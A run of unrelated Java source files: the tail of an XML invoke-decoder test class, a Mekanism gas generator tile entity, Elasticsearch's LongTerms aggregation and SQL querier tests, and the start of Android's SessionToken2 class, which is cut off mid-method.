&lt;/Method&rt; * &lt;/Invoke&rt;" * </p> */ @Test public void verifyXMLParamTypeAttributeMissing() throws Exception { StringBuffer XMLData = new StringBuffer(). append("<Invoke>"). append("<BeanObjectName>TestMBean</BeanObjectName>"). append("<Method name=\"VoidVoidMethod\">"). append("<Param>5</Param>"). append("</Method>"). append("</Invoke>"); BufferedReader br = new BufferedReader(new StringReader(XMLData.toString())); try { InvokeDecoder id = new InvokeDecoder(br, XMLData.length()); id.DecodeInput(); Assert.fail("Failed to receive an exception while decoding the XML input."); } catch(Exception e) { Assert.assertTrue( "An exception should have been thrown indicating XML input is incorrect.", (e.getClass() == ScxException.class)&& (((ScxException)e).getExceptionCode().equals(ScxExceptionCode.ERROR_MALFORMED_INVOKE_XML))); } } /** * <p> * Verify the input stream is valid and contains the correct Parameter, * the parameter has no value. <br> * </p> * * <p> * Ideally, the XML would look something like this:<br> * </pre> * &lt;Invoke&rt; * &lt;BeanObjectName&rt;TestMBean&lt;/BeanObjectName&rt; * &lt;Method name="VoidVoidMethod"&rt; * &lt;Param type="int"&rt;5&lt;/Param&rt; * &lt;/Method&rt; * &lt;/Invoke&rt;" * </p> */ @Test public void verifyXMLParamNoValue() throws Exception { StringBuffer XMLData = new StringBuffer(). append("<Invoke>"). append("<BeanObjectName>TestMBean</BeanObjectName>"). append("<Method name=\"VoidVoidMethod\">"). append("<Param type=\"int\"></Param>"). append("</Method>"). append("</Invoke>"); BufferedReader br = new BufferedReader(new StringReader(XMLData.toString())); try { InvokeDecoder id = new InvokeDecoder(br, XMLData.length()); id.DecodeInput(); Assert.assertEquals( "Parameter 0 value should be \"null\"", id.getMethodParams().get(0).getParamValue() , ""); } catch(Exception e) { Assert.fail("An unknown exception was thrown."); } } /** * <p> * Verify the input stream is valid and contains the correct parameters, * parameter types and values. <br> * </p> * * <p> * Ideally, the XML would look something like this:<br> * * <pre> * &lt;Invoke&rt; * &lt;BeanObjectName&rt;Microsoft:name=TestMBean&lt;/BeanObjectName&rt; * &lt;Method name="VoidIntStringMethod"&rt;&lt;/Method&rt; * &lt;Param type="int"&rt;5&lt;/Param&rt; * &lt;Param type="string"&rt;Woohoo&lt;/Param&rt; * &lt;/Invoke&rt;" * </pre> * * </p> */ @Test public void verifyBodyData() throws Exception { StringBuffer XMLData = new StringBuffer(). append("<Invoke>"). append("<BeanObjectName>TestMBean</BeanObjectName>"). append("<Method name=\"VoidVoidMethod\">"). append("<Param type=\"int\">5</Param>"). append("<Param name=\"Param1\" type=\"string\">abcdefg</Param>"). append("</Method>"). append("</Invoke>"); BufferedReader br = new BufferedReader(new StringReader(XMLData.toString())); InvokeDecoder id = new InvokeDecoder(br, XMLData.length()); id.DecodeInput(); Assert.assertEquals( "Object name should be \"TestMBean\"", id.getBeanObjectName(), "TestMBean"); Assert.assertEquals( "Method name should be \"VoidVoidMethod\"", id.getMethodName(), "VoidVoidMethod"); Assert.assertEquals( "Parameter 1 type should be \"int\"", id.getMethodParams().get(0).getParamType() , "int"); Assert.assertEquals( "Parameter 1 value should be \"5\"", id.getMethodParams().get(0).getParamValue() , "5"); Assert.assertEquals( "Parameter 1 name should be \"string\"", id.getMethodParams().get(1).getParamName() , "Param1"); Assert.assertEquals( "Parameter 1 type should be \"string\"", id.getMethodParams().get(1).getParamType() , "string"); Assert.assertEquals( "Parameter 1 value should be \"abcdefg\"", id.getMethodParams().get(1).getParamValue() , "abcdefg"); } /** * <p> * Verify the input stream is valid and contains the correct Parameter, * the elements contain extra attributes which should be ignored. <br> * </p> * * <p> * Ideally, the XML would look something like this:<br> * </pre> * &lt;Invoke SomeTag="SomeValue"&rt; * &lt;BeanObjectName&rt;TestMBean&lt;/BeanObjectName&rt; * &lt;Method name="VoidVoidMethod"&rt; * &lt;Param type="int"&rt;5&lt;/Param&rt; * &lt;/Method&rt; * &lt;/Invoke&rt;" * </p> */ @Test public void verifyXML_Extra_Attribures() throws Exception { StringBuffer XMLData = new StringBuffer(). append("<Invoke SomeTag=\"SomeValue\">"). append("<BeanObjectName SomeTag=\"SomeValue\">TestMBean</BeanObjectName>"). append("<Method SomeTag=\"SomeValue\" name=\"VoidVoidMethod\">"). append("<Param SomeTag=\"SomeValue\" type=\"int\">100</Param>"). append("</Method>"). append("</Invoke>"); BufferedReader br = new BufferedReader(new StringReader(XMLData.toString())); try { InvokeDecoder id = new InvokeDecoder(br, XMLData.length()); id.DecodeInput(); Assert.assertEquals( "Parameter 0 value should be \"100\"", id.getMethodParams().get(0).getParamValue() , "100"); } catch(Exception e) { Assert.fail("An unknown exception was thrown."); } } }
package mekanism.generators.common.tile; import java.util.ArrayList; import mekanism.api.MekanismConfig.general; import mekanism.api.gas.Gas; import mekanism.api.gas.GasRegistry; import mekanism.api.gas.GasStack; import mekanism.api.gas.GasTank; import mekanism.api.gas.GasTransmission; import mekanism.api.gas.IGasHandler; import mekanism.api.gas.IGasItem; import mekanism.api.gas.ITubeConnection; import mekanism.common.FuelHandler; import mekanism.common.FuelHandler.FuelGas; import mekanism.common.Mekanism; import mekanism.common.base.ISustainedData; import mekanism.common.util.ChargeUtils; import mekanism.common.util.MekanismUtils; import net.minecraft.item.ItemStack; import net.minecraft.nbt.NBTTagCompound; import net.minecraftforge.common.util.ForgeDirection; import cpw.mods.fml.common.Optional.Method; import io.netty.buffer.ByteBuf; import dan200.computercraft.api.lua.ILuaContext; import dan200.computercraft.api.lua.LuaException; import dan200.computercraft.api.peripheral.IComputerAccess; public class TileEntityGasGenerator extends TileEntityGenerator implements IGasHandler, ITubeConnection, ISustainedData { /** The maximum amount of gas this block can store. */ public int MAX_GAS = 18000; /** The tank this block is storing fuel in. */ public GasTank fuelTank; public int burnTicks = 0; public double generationRate = 0; public TileEntityGasGenerator() { super("gas", "GasGenerator", general.FROM_H2*100, general.FROM_H2*2); inventory = new ItemStack[2]; fuelTank = new GasTank(MAX_GAS); } @Override public void onUpdate() { super.onUpdate(); if(!worldObj.isRemote) { ChargeUtils.charge(1, this); if(inventory[0] != null && fuelTank.getStored() < MAX_GAS) { Gas gasType = null; if(fuelTank.getGas() != null) { gasType = fuelTank.getGas().getGas(); } else if(inventory[0] != null && inventory[0].getItem() instanceof IGasItem) { if(((IGasItem)inventory[0].getItem()).getGas(inventory[0]) != null) { gasType = ((IGasItem)inventory[0].getItem()).getGas(inventory[0]).getGas(); } } if(gasType != null && FuelHandler.getFuel(gasType) != null) { GasStack removed = GasTransmission.removeGas(inventory[0], gasType, fuelTank.getNeeded()); boolean isTankEmpty = (fuelTank.getGas() == null); int fuelReceived = fuelTank.receive(removed, true); if(fuelReceived > 0 && isTankEmpty) { output = FuelHandler.getFuel(fuelTank.getGas().getGas()).energyPerTick * 2; } } } if(canOperate()) { setActive(true); if(burnTicks > 0) { burnTicks--; setEnergy(electricityStored + generationRate); } else if(fuelTank.getStored() > 0) { FuelGas fuel = FuelHandler.getFuel(fuelTank.getGas().getGas()); if(fuel != null) { burnTicks = fuel.burnTicks - 1; generationRate = fuel.energyPerTick; fuelTank.draw(1, true); setEnergy(getEnergy() + generationRate); } } else { burnTicks = 0; generationRate = 0; } } else { setActive(false); } } } @Override public boolean canExtractItem(int slotID, ItemStack itemstack, int side) { if(slotID == 1) { return ChargeUtils.canBeOutputted(itemstack, true); } else if(slotID == 0) { return (itemstack.getItem() instanceof IGasItem && ((IGasItem)itemstack.getItem()).getGas(itemstack) == null); } return false; } @Override public boolean isItemValidForSlot(int slotID, ItemStack itemstack) { if(slotID == 0) { return itemstack.getItem() instanceof IGasItem && ((IGasItem)itemstack.getItem()).getGas(itemstack) != null && FuelHandler.getFuel((((IGasItem)itemstack.getItem()).getGas(itemstack).getGas())) != null; } else if(slotID == 1) { return ChargeUtils.canBeCharged(itemstack); } return true; } @Override public int[] getAccessibleSlotsFromSide(int side) { return ForgeDirection.getOrientation(side) == MekanismUtils.getRight(facing) ? new int[] {1} : new int[] {0}; } @Override public boolean canOperate() { return getEnergy() < getMaxEnergy() && fuelTank.getStored() > 0 && MekanismUtils.canFunction(this); } /** * Gets the scaled gas level for the GUI. * @param i - multiplier * @return */ public int getScaledGasLevel(int i) { return fuelTank.getStored()*i / MAX_GAS; } @Override @Method(modid = "ComputerCraft") public String[] getMethodNames() { return new String[] {"getStored", "getOutput", "getMaxEnergy", "getEnergyNeeded", "getGas", "getGasNeeded"}; } @Override @Method(modid = "ComputerCraft") public Object[] callMethod(IComputerAccess computer, ILuaContext context, int method, Object[] arguments) throws LuaException, InterruptedException { switch(method) { case 0: return new Object[] {getEnergy()}; case 1: return new Object[] {output}; case 2: return new Object[] {getMaxEnergy()}; case 3: return new Object[] {getMaxEnergy()-getEnergy()}; case 4: return new Object[] {fuelTank.getStored()}; case 5: return new Object[] {fuelTank.getNeeded()}; default: Mekanism.logger.error("Attempted to call unknown method with computer ID " + computer.getID()); return null; } } @Override public void handlePacketData(ByteBuf dataStream) { super.handlePacketData(dataStream); if(dataStream.readBoolean()) { fuelTank.setGas(new GasStack(GasRegistry.getGas(dataStream.readInt()), dataStream.readInt())); } else { fuelTank.setGas(null); } generationRate = dataStream.readDouble(); output = dataStream.readDouble(); } @Override public ArrayList getNetworkedData(ArrayList data) { super.getNetworkedData(data); if(fuelTank.getGas() != null) { data.add(true); data.add(fuelTank.getGas().getGas().getID()); data.add(fuelTank.getStored()); } else { data.add(false); } data.add(generationRate); data.add(output); return data; } @Override public int receiveGas(ForgeDirection side, GasStack stack, boolean doTransfer) { boolean isTankEmpty = (fuelTank.getGas() == null); if(isTankEmpty || fuelTank.getGas().isGasEqual(stack)) { int fuelReceived = fuelTank.receive(stack, true); if(isTankEmpty && fuelReceived > 0) { output = FuelHandler.getFuel(fuelTank.getGas().getGas()).energyPerTick*2; } return fuelReceived; } return 0; } @Override public int receiveGas(ForgeDirection side, GasStack stack) { return receiveGas(side, stack, true); } @Override public void readFromNBT(NBTTagCompound nbtTags) { super.readFromNBT(nbtTags); fuelTank.read(nbtTags.getCompoundTag("fuelTank")); boolean isTankEmpty = (fuelTank.getGas() == null); FuelGas fuel = (isTankEmpty) ? null : FuelHandler.getFuel(fuelTank.getGas().getGas()); if(fuel != null) { output = fuel.energyPerTick * 2; } } @Override public void writeToNBT(NBTTagCompound nbtTags) { super.writeToNBT(nbtTags); nbtTags.setTag("fuelTank", fuelTank.write(new NBTTagCompound())); } @Override public boolean canReceiveGas(ForgeDirection side, Gas type) { return FuelHandler.getFuel(type) != null && side != ForgeDirection.getOrientation(facing); } @Override public GasStack drawGas(ForgeDirection side, int amount, boolean doTransfer) { return null; } @Override public GasStack drawGas(ForgeDirection side, int amount) { return drawGas(side, amount, true); } @Override public boolean canDrawGas(ForgeDirection side, Gas type) { return false; } @Override public boolean canTubeConnect(ForgeDirection side) { return side != ForgeDirection.getOrientation(facing); } @Override public void writeSustainedData(ItemStack itemStack) { if(fuelTank != null) { itemStack.stackTagCompound.setTag("fuelTank", fuelTank.write(new NBTTagCompound())); } } @Override public void readSustainedData(ItemStack itemStack) { if(itemStack.stackTagCompound.hasKey("fuelTank")) { fuelTank.read(itemStack.stackTagCompound.getCompoundTag("fuelTank")); boolean isTankEmpty = (fuelTank.getGas() == null); //Update energy output based on any existing fuel in tank FuelGas fuel = (isTankEmpty) ? null : FuelHandler.getFuel(fuelTank.getGas().getGas()); if(fuel != null) { output = fuel.energyPerTick * 2; } } } }
/* * Licensed to Elasticsearch under one or more contributor * license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright * ownership. Elasticsearch licenses this file to you under * the Apache License, Version 2.0 (the "License"); you may * not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.elasticsearch.search.aggregations.bucket.terms; import org.elasticsearch.common.Nullable; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.common.xcontent.XContentBuilder; import org.elasticsearch.search.aggregations.AggregationStreams; import org.elasticsearch.search.aggregations.InternalAggregations; import org.elasticsearch.search.aggregations.bucket.BucketStreamContext; import org.elasticsearch.search.aggregations.bucket.BucketStreams; import org.elasticsearch.search.aggregations.reducers.Reducer; import org.elasticsearch.search.aggregations.support.format.ValueFormatter; import org.elasticsearch.search.aggregations.support.format.ValueFormatterStreams; import java.io.IOException; import java.util.ArrayList; import java.util.HashMap; import java.util.List; import java.util.Map; /** * */ public class LongTerms extends InternalTerms<LongTerms, LongTerms.Bucket> { public static final Type TYPE = new Type("terms", "lterms"); public static final AggregationStreams.Stream STREAM = new AggregationStreams.Stream() { @Override public LongTerms readResult(StreamInput in) throws IOException { LongTerms buckets = new LongTerms(); buckets.readFrom(in); return buckets; } }; private final static BucketStreams.Stream<Bucket> BUCKET_STREAM = new BucketStreams.Stream<Bucket>() { @Override public Bucket readResult(StreamInput in, BucketStreamContext context) throws IOException { Bucket buckets = new Bucket(context.formatter(), (boolean) context.attributes().get("showDocCountError")); buckets.readFrom(in); return buckets; } @Override public BucketStreamContext getBucketStreamContext(Bucket bucket) { BucketStreamContext context = new BucketStreamContext(); Map<String, Object> attributes = new HashMap<>(); attributes.put("showDocCountError", bucket.showDocCountError); context.attributes(attributes); context.formatter(bucket.formatter); return context; } }; public static void registerStreams() { AggregationStreams.registerStream(STREAM, TYPE.stream()); BucketStreams.registerStream(BUCKET_STREAM, TYPE.stream()); } static class Bucket extends InternalTerms.Bucket { long term; public Bucket(@Nullable ValueFormatter formatter, boolean showDocCountError) { super(formatter, showDocCountError); } public Bucket(long term, long docCount, InternalAggregations aggregations, boolean showDocCountError, long docCountError, @Nullable ValueFormatter formatter) { super(docCount, aggregations, showDocCountError, docCountError, formatter); this.term = term; } @Override public String getKeyAsString() { return String.valueOf(term); } @Override public Object getKey() { return term; } @Override public Number getKeyAsNumber() { return term; } @Override int compareTerm(Terms.Bucket other) { return Long.compare(term, ((Number) other.getKey()).longValue()); } @Override Bucket newBucket(long docCount, InternalAggregations aggs, long docCountError) { return new Bucket(term, docCount, aggs, showDocCountError, docCountError, formatter); } @Override public void readFrom(StreamInput in) throws IOException { term = in.readLong(); docCount = in.readVLong(); docCountError = -1; if (showDocCountError) { docCountError = in.readLong(); } aggregations = InternalAggregations.readAggregations(in); } @Override public void writeTo(StreamOutput out) throws IOException { out.writeLong(term); out.writeVLong(getDocCount()); if (showDocCountError) { out.writeLong(docCountError); } aggregations.writeTo(out); } @Override public XContentBuilder toXContent(XContentBuilder builder, Params params) throws IOException { builder.startObject(); builder.field(CommonFields.KEY, term); if (formatter != null && formatter != ValueFormatter.RAW) { builder.field(CommonFields.KEY_AS_STRING, formatter.format(term)); } builder.field(CommonFields.DOC_COUNT, getDocCount()); if (showDocCountError) { builder.field(InternalTerms.DOC_COUNT_ERROR_UPPER_BOUND_FIELD_NAME, getDocCountError()); } aggregations.toXContentInternal(builder, params); builder.endObject(); return builder; } } @Nullable ValueFormatter formatter; LongTerms() {} // for serialization public LongTerms(String name, Terms.Order order, @Nullable ValueFormatter formatter, int requiredSize, int shardSize, long minDocCount, List<? extends InternalTerms.Bucket> buckets, boolean showTermDocCountError, long docCountError, long otherDocCount, List<Reducer> reducers, Map<String, Object> metaData) { super(name, order, requiredSize, shardSize, minDocCount, buckets, showTermDocCountError, docCountError, otherDocCount, reducers, metaData); this.formatter = formatter; } @Override public Type type() { return TYPE; } @Override public LongTerms create(List<Bucket> buckets) { return new LongTerms(this.name, this.order, this.formatter, this.requiredSize, this.shardSize, this.minDocCount, buckets, this.showTermDocCountError, this.docCountError, this.otherDocCount, this.reducers(), this.metaData); } @Override public Bucket createBucket(InternalAggregations aggregations, Bucket prototype) { return new Bucket(prototype.term, prototype.docCount, aggregations, prototype.showDocCountError, prototype.docCountError, prototype.formatter); } @Override protected LongTerms create(String name, List<org.elasticsearch.search.aggregations.bucket.terms.InternalTerms.Bucket> buckets, long docCountError, long otherDocCount, InternalTerms prototype) { return new LongTerms(name, prototype.order, ((LongTerms) prototype).formatter, prototype.requiredSize, prototype.shardSize, prototype.minDocCount, buckets, prototype.showTermDocCountError, docCountError, otherDocCount, prototype.reducers(), prototype.getMetaData()); } @Override protected void doReadFrom(StreamInput in) throws IOException { this.docCountError = in.readLong(); this.order = InternalOrder.Streams.readOrder(in); this.formatter = ValueFormatterStreams.readOptional(in); this.requiredSize = readSize(in); this.shardSize = readSize(in); this.showTermDocCountError = in.readBoolean(); this.minDocCount = in.readVLong(); this.otherDocCount = in.readVLong(); int size = in.readVInt(); List<InternalTerms.Bucket> buckets = new ArrayList<>(size); for (int i = 0; i < size; i++) { Bucket bucket = new Bucket(formatter, showTermDocCountError); bucket.readFrom(in); buckets.add(bucket); } this.buckets = buckets; this.bucketMap = null; } @Override protected void doWriteTo(StreamOutput out) throws IOException { out.writeLong(docCountError); InternalOrder.Streams.writeOrder(order, out); ValueFormatterStreams.writeOptional(formatter, out); writeSize(requiredSize, out); writeSize(shardSize, out); out.writeBoolean(showTermDocCountError); out.writeVLong(minDocCount); out.writeVLong(otherDocCount); out.writeVInt(buckets.size()); for (InternalTerms.Bucket bucket : buckets) { bucket.writeTo(out); } } @Override public XContentBuilder doXContentBody(XContentBuilder builder, Params params) throws IOException { builder.field(InternalTerms.DOC_COUNT_ERROR_UPPER_BOUND_FIELD_NAME, docCountError); builder.field(SUM_OF_OTHER_DOC_COUNTS, otherDocCount); builder.startArray(CommonFields.BUCKETS); for (InternalTerms.Bucket bucket : buckets) { bucket.toXContent(builder, params); } builder.endArray(); return builder; } }
/* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ package org.elasticsearch.xpack.sql.execution.search; import org.elasticsearch.action.ActionListener; import org.elasticsearch.common.io.stream.NamedWriteable; import org.elasticsearch.core.Tuple; import org.elasticsearch.search.aggregations.MultiBucketConsumerService; import org.elasticsearch.test.ESTestCase; import org.elasticsearch.xpack.ql.type.Schema; import org.elasticsearch.xpack.sql.SqlTestUtils; import org.elasticsearch.xpack.sql.execution.search.Querier.AggSortingQueue; import org.elasticsearch.xpack.sql.session.Cursor; import org.elasticsearch.xpack.sql.session.SchemaRowSet; import org.elasticsearch.xpack.sql.session.SqlSession; import java.util.ArrayList; import java.util.Arrays; import java.util.BitSet; import java.util.Collections; import java.util.Comparator; import java.util.List; import java.util.concurrent.atomic.AtomicInteger; import static java.util.Collections.emptyList; import static org.elasticsearch.xpack.sql.execution.search.ScrollCursorTests.randomHitExtractor; public class QuerierTests extends ESTestCase { @SuppressWarnings("rawtypes") public void testAggSortingAscending() { Tuple<Integer, Comparator> tuple = new Tuple<>(0, Comparator.naturalOrder()); Querier.AggSortingQueue queue = new AggSortingQueue(10, Collections.singletonList(tuple)); for (int i = 50; i >= 0; i--) { queue.insertWithOverflow(new Tuple<>(Collections.singletonList(i), i)); } List<List<?>> results = queue.asList(); assertEquals(10, results.size()); for (int i = 0; i < 10; i++) { assertEquals(i, results.get(i).get(0)); } } @SuppressWarnings("rawtypes") public void testAggSortingDescending() { Tuple<Integer, Comparator> tuple = new Tuple<>(0, Comparator.reverseOrder()); Querier.AggSortingQueue queue = new AggSortingQueue(10, Collections.singletonList(tuple)); for (int i = 0; i <= 50; i++) { queue.insertWithOverflow(new Tuple<>(Collections.singletonList(i), i)); } List<List<?>> results = queue.asList(); assertEquals(10, results.size()); for (int i = 0; i < 10; i++) { assertEquals(50 - i, results.get(i).get(0)); } } @SuppressWarnings("rawtypes") public void testAggSorting_TwoFields() { List<Tuple<Integer, Comparator>> tuples = new ArrayList<>(2); tuples.add(new Tuple<>(0, Comparator.reverseOrder())); tuples.add(new Tuple<>(1, Comparator.naturalOrder())); Querier.AggSortingQueue queue = new AggSortingQueue(10, tuples); for (int i = 1; i <= 100; i++) { queue.insertWithOverflow(new Tuple<>(Arrays.asList(i % 50 + 1, i), i)); } List<List<?>> results = queue.asList(); assertEquals(10, results.size()); for (int i = 0; i < 10; i++) { assertEquals(50 - (i / 2), results.get(i).get(0)); assertEquals(49 - (i / 2) + ((i % 2) * 50), results.get(i).get(1)); } } @SuppressWarnings("rawtypes") public void testAggSorting_TwoFields_One_Presorted() { List<Tuple<Integer, Comparator>> tuples = new ArrayList<>(2); tuples.add(new Tuple<>(0, null)); tuples.add(new Tuple<>(1, Comparator.reverseOrder())); Querier.AggSortingQueue queue = new AggSortingQueue(20, tuples); for (int i = 1; i <= 100; i++) { queue.insertWithOverflow(new Tuple<>(Arrays.asList(i <= 5 ? null : 100 - i + 1, i), i)); } List<List<?>> results = queue.asList(); assertEquals(20, results.size()); for (int i = 0; i < 20; i++) { assertEquals(i < 5 ? null : 100 - i, results.get(i).get(0)); assertEquals(i < 5 ? 5 - i : i + 1, results.get(i).get(1)); } } @SuppressWarnings({ "rawtypes", "unchecked" }) public void testAggSorting_FourFields() { List<Comparator> comparators = Arrays.<Comparator>asList( Comparator.naturalOrder(), Comparator.naturalOrder(), Comparator.reverseOrder(), Comparator.naturalOrder() ); List<Tuple<Integer, Comparator>> tuples = new ArrayList<>(4); tuples.add(new Tuple<>(0, null)); tuples.add(new Tuple<>(1, comparators.get(1))); tuples.add(new Tuple<>(2, null)); tuples.add(new Tuple<>(3, comparators.get(3))); Querier.AggSortingQueue queue = new AggSortingQueue(35, tuples); List<List<Integer>> expected = new ArrayList<>(128); for (int i = 0; i < 128; i++) { int col1 = i / 16; int col2 = 15 - (i / 8); int col3 = 32 - (i / 4); int col4 = 127 - i; expected.add(Arrays.asList(col1, col2, col3, col4)); queue.insertWithOverflow(new Tuple<>(Arrays.asList(col1, col2, col3, col4), i)); } expected.sort((o1, o2) -> { for (int i = 0; i < 4; i++) { int result = comparators.get(i).compare(o1.get(i), o2.get(i)); if (result != 0) { return result; } } return 0; }); List<List<?>> results = queue.asList(); assertEquals(35, results.size()); for (int i = 0; i < 35; i++) { for (int j = 0; j < 4; j++) { assertEquals(expected.get(i).get(j), results.get(i).get(j)); } } } @SuppressWarnings("rawtypes") public void testAggSorting_Randomized() { // Initialize comparators for fields (columns) int noColumns = randomIntBetween(3, 10); List<Tuple<Integer, Comparator>> tuples = new ArrayList<>(noColumns); boolean[] ordering = new boolean[noColumns]; for (int j = 0; j < noColumns; j++) { boolean order = randomBoolean(); ordering[j] = order; Comparator comp = order ? Comparator.naturalOrder() : Comparator.reverseOrder(); tuples.add(new Tuple<>(j, comp)); } // Insert random no of documents (rows) with random 0/1 values for each field int noDocs = randomIntBetween(10, 50); int queueSize = randomIntBetween(4, noDocs / 2); List<List<Integer>> expected = new ArrayList<>(noDocs); Querier.AggSortingQueue queue = new AggSortingQueue(queueSize, tuples); for (int i = 0; i < noDocs; i++) { List<Integer> values = new ArrayList<>(noColumns); for (int j = 0; j < noColumns; j++) { values.add(randomBoolean() ? 1 : 0); } queue.insertWithOverflow(new Tuple<>(values, i)); expected.add(values); } List<List<?>> results = queue.asList(); assertEquals(queueSize, results.size()); expected.sort((o1, o2) -> { for (int j = 0; j < noColumns; j++) { if (o1.get(j) < o2.get(j)) { return ordering[j] ? -1 : 1; } else if (o1.get(j) > o2.get(j)) { return ordering[j] ? 1 : -1; } } return 0; }); assertEquals(expected.subList(0, queueSize), results); } public void testFullQueueSortingOnLocalSort() { Tuple<Integer, Integer> actions = runLocalAggSorterWithNoLimit(MultiBucketConsumerService.DEFAULT_MAX_BUCKETS); assertEquals("Exactly one response expected", 1, actions.v1().intValue()); assertEquals("No failures expected", 0, actions.v2().intValue()); } public void testQueueOverflowSortingOnLocalSort() { Tuple<Integer, Integer> actions = runLocalAggSorterWithNoLimit(MultiBucketConsumerService.DEFAULT_MAX_BUCKETS + 2); assertEquals("No response expected", 0, actions.v1().intValue()); assertEquals("Exactly one failure expected", 1, actions.v2().intValue()); } Tuple<Integer, Integer> runLocalAggSorterWithNoLimit(int dataSize) { class TestResultRowSet<E extends NamedWriteable> extends ResultRowSet<E> implements SchemaRowSet { private int rowCounter = 0; private final int dataSize; TestResultRowSet(List<E> extractors, BitSet mask, int dataSize) { super(extractors, mask); this.dataSize = dataSize; } @Override protected Object extractValue(NamedWriteable namedWriteable) { return rowCounter++; } @Override protected boolean doHasCurrent() { return true; } @Override protected boolean doNext() { return rowCounter < dataSize; } @Override protected void doReset() {} @Override public Schema schema() { return new Schema(emptyList(), emptyList()); } @Override public int size() { return dataSize; // irrelevant } } ; Cursor.Page page = new Cursor.Page( new TestResultRowSet<NamedWriteable>(List.of(randomHitExtractor(0)), new BitSet(), dataSize), Cursor.EMPTY ); AtomicInteger responses = new AtomicInteger(); AtomicInteger failures = new AtomicInteger(); ActionListener<Cursor.Page> listener = new ActionListener<>() { @Override public void onResponse(Cursor.Page page) { responses.getAndIncrement(); } @Override public void onFailure(Exception e) { failures.getAndIncrement(); } }; SqlSession session = new SqlSession(SqlTestUtils.TEST_CFG, null, null, null, null, null, null, null, null); Querier querier = new Querier(session); Querier.LocalAggregationSorterListener localSorter = querier.new LocalAggregationSorterListener(listener, emptyList(), -1); localSorter.onResponse(page); return new Tuple<>(responses.get(), failures.get()); } }
/* * Copyright 2018 The Android Open Source Project * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package androidx.media; import static androidx.annotation.RestrictTo.Scope.LIBRARY_GROUP; import android.content.ComponentName; import android.content.Context; import android.content.Intent; import android.content.pm.PackageManager; import android.content.pm.ResolveInfo; import android.media.session.MediaSessionManager; import android.os.Bundle; import android.support.v4.media.session.MediaSessionCompat; import android.text.TextUtils; import androidx.annotation.IntDef; import androidx.annotation.NonNull; import androidx.annotation.Nullable; import androidx.annotation.RestrictTo; import java.lang.annotation.Retention; import java.lang.annotation.RetentionPolicy; import java.util.List; /** * Represents an ongoing {@link MediaSession2}. * <p> * This may be passed to apps by the session owner to allow them to create a * {@link MediaController2} to communicate with the session. * <p> * It can be also obtained by {@link MediaSessionManager}. */ // New version of MediaSession.Token for following reasons // - Stop implementing Parcelable for updatable support // - Represent session and library service (formerly browser service) in one class. // Previously MediaSession.Token was for session and ComponentName was for service. public final class SessionToken2 { /** * @hide */ @RestrictTo(LIBRARY_GROUP) @Retention(RetentionPolicy.SOURCE) @IntDef(value = {TYPE_SESSION, TYPE_SESSION_SERVICE, TYPE_LIBRARY_SERVICE}) public @interface TokenType { } /** * Type for {@link MediaSession2}. */ public static final int TYPE_SESSION = 0; /** * @hide */ @RestrictTo(LIBRARY_GROUP) public static final int TYPE_SESSION_SERVICE = 1; /** * @hide */ @RestrictTo(LIBRARY_GROUP) public static final int TYPE_LIBRARY_SERVICE = 2; //private final SessionToken2Provider mProvider; // From the return value of android.os.Process.getUidForName(String) when error private static final int UID_UNKNOWN = -1; private static final String KEY_UID = "android.media.token.uid"; private static final String KEY_TYPE = "android.media.token.type"; private static final String KEY_PACKAGE_NAME = "android.media.token.package_name"; private static final String KEY_SERVICE_NAME = "android.media.token.service_name"; private static final String KEY_ID = "android.media.token.id"; private static final String KEY_SESSION_TOKEN = "android.media.token.session_token"; private final int mUid; private final @TokenType int mType; private final String mPackageName; private final String mServiceName; private final String mId; private final MediaSessionCompat.Token mSessionCompatToken; private final ComponentName mComponentName; /** * @hide * Constructor for the token. You can only create token for session service or library service * to use by {@link MediaController2} or {@link MediaBrowser2}. * * @param context The context. * @param serviceComponent The component name of the media browser service. */ @RestrictTo(LIBRARY_GROUP) public SessionToken2(@NonNull Context context, @NonNull ComponentName serviceComponent) { this(context, serviceComponent, UID_UNKNOWN); } /** * Constructor for the token. You can only create token for session service or library service * to use by {@link MediaController2} or {@link MediaBrowser2}. * * @param context The context. * @param serviceComponent The component name of the media browser service. * @param uid uid of the app. * @hide */ @RestrictTo(LIBRARY_GROUP) public SessionToken2(@NonNull Context context, @NonNull ComponentName serviceComponent, int uid) { if (serviceComponent == null) { throw new IllegalArgumentException("serviceComponent shouldn't be null"); } mComponentName = serviceComponent; mPackageName = serviceComponent.getPackageName(); mServiceName = serviceComponent.getClassName(); // Calculate uid if it's not specified. final PackageManager manager = context.getPackageManager(); if (uid < 0) { try { uid = manager.getApplicationInfo(mPackageName, 0).uid; } catch (PackageManager.NameNotFoundException e) { throw new IllegalArgumentException("Cannot find package " + mPackageName); } } mUid = uid; // Infer id and type from package name and service name String id = getSessionIdFromService(manager, MediaLibraryService2.SERVICE_INTERFACE, serviceComponent); if (id != null) { mId = id; mType = TYPE_LIBRARY_SERVICE; } else { // retry with session service mId = getSessionIdFromService(manager, MediaSessionService2.SERVICE_INTERFACE, serviceComponent); mType = TYPE_SESSION_SERVICE; } if (mId == null) { throw new IllegalArgumentException("service " + mServiceName + " doesn't implement" + " session service nor library service. Use service's full name."); } mSessionCompatToken = null; } /** * @hide */ @RestrictTo(LIBRARY_GROUP) SessionToken2(int uid, int type, String packageName, String serviceName, String id, MediaSessionCompat.Token sessionCompatToken) { mUid = uid; mType = type; mPackageName = packageName; mServiceName = serviceName; mComponentName = (mType == TYPE_SESSION) ? null : new ComponentName(packageName, serviceName); mId = id; mSessionCompatToken = sessionCompatToken; } @Override public int hashCode() { final int prime = 31; return mType + prime * (mUid + prime * (mPackageName.hashCode() + prime * (mId.hashCode() + prime * (mServiceName != null ? mServiceName.hashCode() : 0)))); } @Override public boolean 